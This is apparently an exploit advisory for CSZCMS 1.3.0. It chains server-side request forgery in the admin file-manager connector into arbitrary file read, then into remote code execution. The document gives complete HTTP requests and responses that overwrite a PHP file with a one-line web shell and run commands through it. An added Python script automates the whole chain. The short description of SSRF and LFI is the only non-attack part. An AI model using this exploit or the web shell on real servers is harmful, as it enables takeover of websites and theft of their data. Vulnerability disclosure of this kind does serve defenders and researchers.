
CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution

Posted Apr 7, 2022
Authored by Hejap Zairy

CSZCMS version 1.3.0 server-side request forgery exploit that leverages local file inclusion to inject a remote shell.

tags | exploit, remote, shell, local, file inclusion
SHA-256 | 076778f725ea205cb5e59b34e6f765677401b4867ef7f2cfb8b18d6f76bd956a

# Title:  CSZCMS V1.3.0 - SSRF to LFI to RCE
# Author: Hejap Zairy
# Date: 07.04.2022
# Vendor: https://sourceforge.net/projects/cszcms/files/install/
# Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache


# Exploit chain
# 1 - SSRF: make the admin file-manager connector request another connector URL
# 2 - SSRF to LFI: read an arbitrary file from the CMS directory through cmd=get
# 3 - LFI to RCE: overwrite an existing PHP file under the web root with a web shell through cmd=put

# Vulnerable code (PHP)
# The connector dispatches every command in the table below. The write-capable ones (put, mkfile, upload, rename, paste, rm, chmod) are not filtered out or restricted to non-executable content, which is what the chain below relies on.


```php
// $commands table of the bundled elFinder connector class (elFinder.class.php):
// key = command name, value = its parameters and whether each one is required.
protected static $base64encodeSessionData = false;
protected $commands = array(
'abort' => array('id' => true),
'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),
'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),
'chmod' => array('targets' => true, 'mode' => true),
'dim' => array('target' => true, 'substitute' => false),
'duplicate' => array('targets' => true, 'suffix' => false),
'editor' => array('name' => true, 'method' => true, 'args' => false),
'extract' => array('target' => true, 'mimes' => false, 'makedir' => false),
'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false),
'get' => array('target' => true, 'conv' => false),
'info' => array('targets' => true, 'compare' => false),
'ls' => array('target' => true, 'mimes' => false, 'intersect' => false),
'mkdir' => array('target' => true, 'name' => false, 'dirs' => false),
'mkfile' => array('target' => true, 'name' => true, 'mimes' => false),
'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false),
'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false),
'parents' => array('target' => true, 'until' => false),
'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false),
'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false),
'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false),
'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false),
'rm' => array('targets' => true),
'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false),
'size' => array('targets' => true),
'subdirs' => array('targets' => true),
'tmb' => array('targets' => true),
'tree' => array('target' => true),
'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false),
'url' => array('target' => true, 'options' => false),
'zipdl' => array('targets' => true, 'download' => false)
);
```

[+] Payload (GET)

# Target hashes are "<volume id>_<base64 of the volume-relative path>" with the '=' padding stripped:
#   l1_MGRheS5waHA=               -> 0day.php
#   l3_Y3N6ZGVmYXVsdC9tYWluLnBocA -> cszdefault/main.php
# The nested connector URL is passed in targets=. Because PHP splits the query string on "&",
# the embedded target=l1_... also arrives as a top-level parameter, and that is the file cmd=get returns.


```
GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn
Connection: close


```


#Status: CRITICAL

#Response
```
{"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="}
# the base64 part decodes to the PHP one-liner:  <?=`$_GET[515]`?>

```




# Request: overwrite config_example.inc.php in the web root with cmd=put
# (l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA decodes to config_example.inc.php on volume l6, whose root l6_Lw is the web root)
```
POST /cms/admin/filemanager/connector/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 128
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/cms/admin/filemanager
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed
Connection: close

cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32
```







#Response

```
HTTP/1.1 200 OK
Date: Thu, 07 Apr 2022 06:31:19 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=3600, must-revalidate
Pragma: no-cache
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Content-Length: 190
Connection: keep-alive, close
Content-Type: application/json; charset=utf-8

{"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]}
```






# Web shell: the overwritten file is served straight from the web root and runs the command passed in the 515 parameter

```
GET /cms/config_example.inc.php?515=dir HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed
Connection: close


```



# Response (output of dir on the server)

```
HTTP/1.1 200 OK
Date: Thu, 07 Apr 2022 06:37:33 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.27
Connection: keep-alive, close
Cache-Control: max-age=3600, must-revalidate
Content-Length: 1917
Content-Type: text/html; charset=UTF-8

Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA

Directory of C:\xampp\htdocs\cms

04/07/2022 09:13 AM <DIR> .
04/07/2022 02:23 AM <DIR> ..
04/30/2019 05:29 PM 8,444 .htaccess
04/07/2022 09:13 AM <DIR> .quarantine
04/07/2022 09:13 AM <DIR> .tmb
04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv
04/07/2022 07:14 AM 5,362 127.0.0.1_files_20220407.zip
04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip
04/07/2022 06:57 AM <DIR> assets
04/09/2018 03:34 PM 479 cache.config.inc.php
11/29/2021 07:40 AM 4,733 CHANGELOG
04/07/2022 06:55 AM 696 config.inc.php
04/07/2022 09:37 AM 17 config_example.inc.php
08/07/2018 05:18 AM 4,075 CONTRIBUTING.md
04/21/2021 07:01 AM 151,259 corecss.css
04/21/2021 07:01 AM 378,086 corejs.js
04/07/2022 06:57 AM <DIR> cszcms
06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php
04/07/2022 06:55 AM 690 env.config.inc.php
04/07/2022 06:55 AM 269 htaccess.config.inc.php
06/28/2019 02:48 PM 11,526 index.php
04/07/2022 06:57 AM <DIR> install
01/28/2020 06:40 AM 3,439 LICENSE.md
04/09/2018 03:35 PM 336 memcached.config.inc.php
04/09/2018 03:34 PM 1,297 nginx_example.com.conf
04/07/2022 09:13 AM <DIR> photo
04/09/2021 09:52 AM 1,744 proxy.inc.php
11/11/2021 07:48 AM 1,868 README.md
04/09/2018 03:35 PM 496 redis.config.inc.php
11/11/2021 07:46 AM 520 SECURITY.md
04/07/2022 06:57 AM <DIR> system
04/07/2022 09:13 AM <DIR> templates
22 File(s) 630,398 bytes
10 Dir(s) 80,676,995,072 bytes free

```
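The three connector requests above, rebuilt as an added Python example (this is not code from the advisory or from CSZCMS). The helper names, the BASE and COOKIE placeholders, and the assumption that an admin file-manager session cookie is already in hand are mine. It encodes and decodes the connector's target hashes so the page's own values can be checked offline, builds the cmd=put body with the same percent-encoding the advisory's POST carries, and only touches the network when run as a script.

```python
"""Added example, not the advisory's or CSZCMS's own code: the three connector
requests from the write-up rebuilt as Python so each step can be checked
offline.  Assumed (not from the page): the helper names, the BASE/COOKIE
placeholders, and that an admin file-manager session cookie is already held."""
import base64
import json
import urllib.parse
import urllib.request
from typing import Optional, Tuple

BASE = "http://127.0.0.1/cms"                                    # lab host from the advisory
COOKIE = "9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=REPLACE_ME"   # placeholder, assumed
GET_CONNECTOR = BASE + "/index.php/admin/filemanager/connector/"
POST_CONNECTOR = BASE + "/admin/filemanager/connector/"
# The advisory's one-liner: backticks run the value of $_GET[515] as a shell command.
PAYLOAD = "<?=`$_GET[515]`?>"

_ENC = str.maketrans("+/=", "-_.")
_DEC = str.maketrans("-_.", "+/=")


def elfinder_hash(volume: str, path: str) -> str:
    """Target hash as the connector expects it: '<volume>_' + base64 of the
    volume-relative path with '+/' mapped to '-_' and '=' padding dropped
    (so '/' on volume l6 becomes 'l6_Lw', as seen in the put response)."""
    return volume + "_" + base64.b64encode(path.encode()).decode().translate(_ENC).rstrip(".")


def elfinder_unhash(target: str) -> Tuple[str, str]:
    """Inverse of elfinder_hash; also accepts the '=' padding the advisory left in."""
    volume, _, b64 = target.partition("_")
    b64 = b64.translate(_DEC)
    b64 += "=" * (-len(b64) % 4)
    return volume, base64.b64decode(b64).decode()


def build_get_url(target: str) -> str:
    """Steps 1-2: cmd=get with a nested connector URL in targets=.  PHP splits
    the query string on '&', so the inner '&target=<hash>' also arrives as a
    top-level parameter, and that hash is the file cmd=get returns."""
    inner = GET_CONNECTOR + "?cmd=file&target=" + target
    return GET_CONNECTOR + "?cmd=get&targets=" + inner


def decode_get_content(body: str) -> str:
    """cmd=get answers {"content": ...}; the advisory received a data: URI whose
    base64 part is the raw file, so unwrap it when present."""
    content = json.loads(body)["content"]
    if content.startswith("data:") and ";base64," in content:
        content = base64.b64decode(content.split(",", 1)[1]).decode()
    return content


def build_put_body(target: str, content: str = PAYLOAD) -> str:
    """Step 3: cmd=put overwrites an existing file.  urlencode() produces the
    same percent-encoding as the advisory's POST body (minus its client-side reqid)."""
    return urllib.parse.urlencode(
        {"cmd": "put", "target": target, "encoding": "UTF-8", "content": content})


def put_succeeded(body: str, name: str) -> bool:
    """The connector reports a successful write as a 'changed' entry naming the file."""
    return any(f.get("name") == name for f in json.loads(body).get("changed", []))


def webshell_url(command: str) -> str:
    """The overwritten file is served from the web root; 515 is the GET
    parameter the payload executes."""
    return BASE + "/config_example.inc.php?515=" + urllib.parse.quote(command)


def _fetch(url: str, data: Optional[bytes] = None) -> str:
    req = urllib.request.Request(url, data=data, headers={
        "Cookie": COOKIE, "X-Requested-With": "XMLHttpRequest"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":   # live run against a lab instance only
    print(decode_get_content(_fetch(build_get_url(elfinder_hash("l1", "0day.php")))))
    target = elfinder_hash("l6", "config_example.inc.php")
    if put_succeeded(_fetch(POST_CONNECTOR, build_put_body(target).encode()), "config_example.inc.php"):
        print(_fetch(webshell_url("dir")))
```

Run it without arguments against a lab host after replacing COOKIE; the hash helpers and body builder can be checked against the values on this page without any target, which is the quickest way to confirm a volume id and path before sending a write.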

# Description:
Server-side request forgery lets an attacker make the server issue requests on their behalf: to internal-only services within the organisation's infrastructure, or to arbitrary external systems, potentially leaking sensitive data such as authorisation credentials. Here the file-manager connector is the client that is forced to make the request.
Local file inclusion tricks the web application into reading or executing files on the web server. When the attacker can also write to a file the server executes, as with cmd=put above, the chain becomes remote code execution.


# Proof and Exploit:
https://i.imgur.com/pzWjkXI.png
https://i.imgur.com/xxjxnGk.png
https://i.imgur.com/S1F7MaJ.png
https://i.imgur.com/BwWTfYU.png

packet storm

© 2024 Packet Storm. All rights reserved.